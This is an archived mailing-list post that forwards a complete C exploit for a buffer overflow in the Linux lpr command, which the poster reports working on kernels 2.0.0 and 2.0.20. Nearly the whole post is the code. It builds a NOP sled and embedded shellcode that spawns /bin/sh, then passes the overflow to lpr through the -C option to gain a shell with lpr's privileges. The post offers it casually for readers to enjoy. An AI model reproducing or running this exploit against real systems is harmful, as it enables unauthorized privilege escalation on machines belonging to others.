[Prev][Next][Index][Thread]

Linux's lpr exploit (fwd)



Hi there !
Hope you all will like it . If it isn't the place for jokes
like this ,please tell me .
 Alos ,if anybody wants patch ,also tell me .

                 Enjoy ,
                                    Meir .

All thanx going to Vadim Kolontsov  ,Tver .

Checked on 2.0.0 and 2.0.20 ,worked for both .
-----------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define DEFAULT_OFFSET        50
#define BUFFER_SIZE           1023

long get_esp(void)
{
 __asm__("movl %esp,%eax\n");
}

void main()
{
 char *buff = NULL;
 unsigned long *addr_ptr = NULL;
 char *ptr = NULL;

 u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
		        "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
		      "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
		      "\xd7\xff\xff\xff/bin/sh";
 int i;

 buff = malloc(4096);
 if(!buff)
 {
    printf("can't allocate memory\n");
    exit(0);
 }
 ptr = buff;
 memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
 ptr += BUFFER_SIZE-strlen(execshell);
 for(i=0;i < strlen(execshell);i++)
    *(ptr++) = execshell[i];
 addr_ptr = (long *)ptr;
 for(i=0;i<2;i++)
    *(addr_ptr++) = get_esp() + DEFAULT_OFFSET;
 ptr = (char *)addr_ptr;
 *ptr = 0;
 execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);
}
--------------------------------------------------------------------------
Vadim Kolontsov                                        SysAdm/Programmer 
Tver Regional Center of New Information Technologies        Networks Lab




Follow-Ups: